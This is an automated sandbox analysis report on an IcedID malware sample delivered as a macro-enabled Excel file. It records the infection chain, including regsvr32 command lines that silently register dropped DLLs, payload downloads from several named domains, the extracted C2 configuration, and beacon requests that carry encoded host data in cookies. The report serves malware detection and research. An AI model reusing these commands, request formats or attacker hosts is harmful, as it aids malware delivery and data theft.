Windows Analysis Report Purchaseconfirmation-137606.xlsm

Overview

General Information

Sample Name: Purchaseconfirmation-137606.xlsm
Analysis ID: 444685
MD5: 732851906622ca3c151360bdfda8b3f2
SHA1: 8a365e71a0fc1f1ae38faef239ab085001b5f83f
SHA256: 89aabd4ab6b696b3e9f74a04f27c4bc12f90b3a30855a403767ed525baec1736
Tags: IcedID, xlsm

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2708 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3048 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2176 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

    Memory Dumps

    Source | Rule | Description | Author | Strings
    00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
      00000003.00000002.2099597118.0000000000110000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
        00000006.00000002.2114378210.0000000000120000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

          Unpacked PEs

          Source | Rule | Description | Author | Strings
          3.2.regsvr32.exe.110000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          4.2.regsvr32.exe.110000.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
          • 0x1bc6:$internal_name: loader_dll_64.dll
          • 0x1f16:$string6: WINHTTP.dll
          • 0x1bea:$string7: DllRegisterServer
          • 0x1bfc:$string8: PluginInit
          6.2.regsvr32.exe.120000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          6.2.regsvr32.exe.200000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30bc:$string0: _gat=
          • 0x311c:$string1: _ga=
          • 0x30f4:$string2: _gid=
          • 0x30d4:$string3: _u=
          • 0x302e:$string4: _io=
          • 0x30e0:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3088:$string9: POST
          • 0x3148:$string10: aws.amazon.com
          3.2.regsvr32.exe.460000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30bc:$string0: _gat=
          • 0x311c:$string1: _ga=
          • 0x30f4:$string2: _gid=
          • 0x30d4:$string3: _u=
          • 0x302e:$string4: _io=
          • 0x30e0:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3088:$string9: POST
          • 0x3148:$string10: aws.amazon.com

          Sigma Overview

          System Summary:

          Sigma detected: Microsoft Office Product Spawning Windows Shell
          Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2492, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2708

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 6.2.regsvr32.exe.120000.0.raw.unpack, Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
          Yara detected IcedID
          Source: Yara match, File source: dump.pcap, type: PCAP
          Source: Yara match, File source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY
          Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

          Software Vulnerabilities:

          Document exploit detected (creates forbidden files)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XZIBIT.dll
          Document exploit detected (drops PE files)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: lsdfik[1].fml.0.dr
          Document exploit detected (UrlDownloadToFile)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
          Source: global traffic, DNS query: name: thousandsyears.download
          Source: global traffic, TCP traffic: 192.168.2.22:49168 -> 13.224.92.73:443
          Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: astrocycle.download
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 06 Jul 2021 13:12:20 GMT | Content-Type: application/octet-stream | Content-Length: 57856 | Connection: keep-alive | Content-Disposition: attachment; filename=lsdfik.fml | Cache-Control: max-age=14400 | CF-Cache-Status: HIT | Age: 4570 | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=O0dc7lvLICauGXDuIZ%2BlUJ0czK0%2FHrzDaLd78hxuxDslW%2FEG7dUbO8GtBLbuhCTL9p3xRamKpR049uJzRM%2F%2BPaEAQMK2guwOR06G7FUf9ZRr7bwsf%2FtO4ngVq0uKYPxd5lcxgN4%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 66a91587ef2a4a9e-FRA | alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 06 Jul 2021 13:12:20 GMT | Content-Type: application/octet-stream | Content-Length: 57856 | Connection: keep-alive | Content-Disposition: attachment; filename=lsdfik.fml | Cache-Control: max-age=14400 | CF-Cache-Status: HIT | Age: 4569 | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d%2BaXch2L3fd900zKjzyYSRfC9hQVPWG3n4OZYVEj39RvIOnQ1%2Fa8iGrhk9uRSqSlCiC1SigaLdQfqr0oQ0gBrEPc4nhFAbBdmpUQpqqW7Ea51Pqhc0o5X6y1jw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 66a915898a8f4e2b-FRA | alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 06 Jul 2021 13:12:20 GMT | Content-Type: application/octet-stream | Content-Length: 57856 | Connection: keep-alive | Content-Disposition: attachment; filename=lsdfik.fml | Cache-Control: max-age=14400 | CF-Cache-Status: HIT | Age: 4568 | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TcxOBI3LE7hks3UaLOzUCmei%2B3AhO5N50KzVCQZzFU1dHMyrurpRjRiizcjGmU0Vvk2hCVFbxSnz%2FlI9j7iM2llIWQNg49350wtmQZK7MwLZo2PMqLP68%2BaJ5mQ%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 66a9158b08f1177a-FRA | alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=3565085024:1:4650:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383635374239393136433034454441; __io=0; _gid=67AFEDC5AC03 | Host: astrocycle.download
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=3565085024:1:4654:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:39463738354244374233363041433337; __io=0; _gid=67AFEDC5AC03 | Host: astrocycle.download
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: __gads=3565085024:1:4657:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383342324439354536373742443933; __io=0; _gid=67AFEDC5AC03 | Host: astrocycle.download
          Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: global traffic, HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: thousandsyears.download | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: voopeople.fun | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: uppercilio.fun | Connection: Keep-Alive
          Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: unknown, HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B690E83.png
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmp, String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmp, String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknown, DNS traffic detected: queries for: thousandsyears.download
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 06 Jul 2021 13:12:24 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eqVDpeP3%2FQWy91%2BnROpUr1zFbLOABWy3KxvIavdHrlVsvVafuJbIVzkMZyh5BR6WYn0mKLNptc2rXflmcrwvcPIeU1Dl6F5jJb5%2F5TDBK2ouFaIhUMxIOfZz6pAcN8WJTQ%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 66a9159dbd54bef6-FRA | alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 | Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, String found in binary or memory: http://astrocycle.download/
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
          Source: regsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: regsvr32.exe, 00000003.00000002.2099791165.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2107057604.0000000001CB0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114750250.0000000001D90000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: regsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
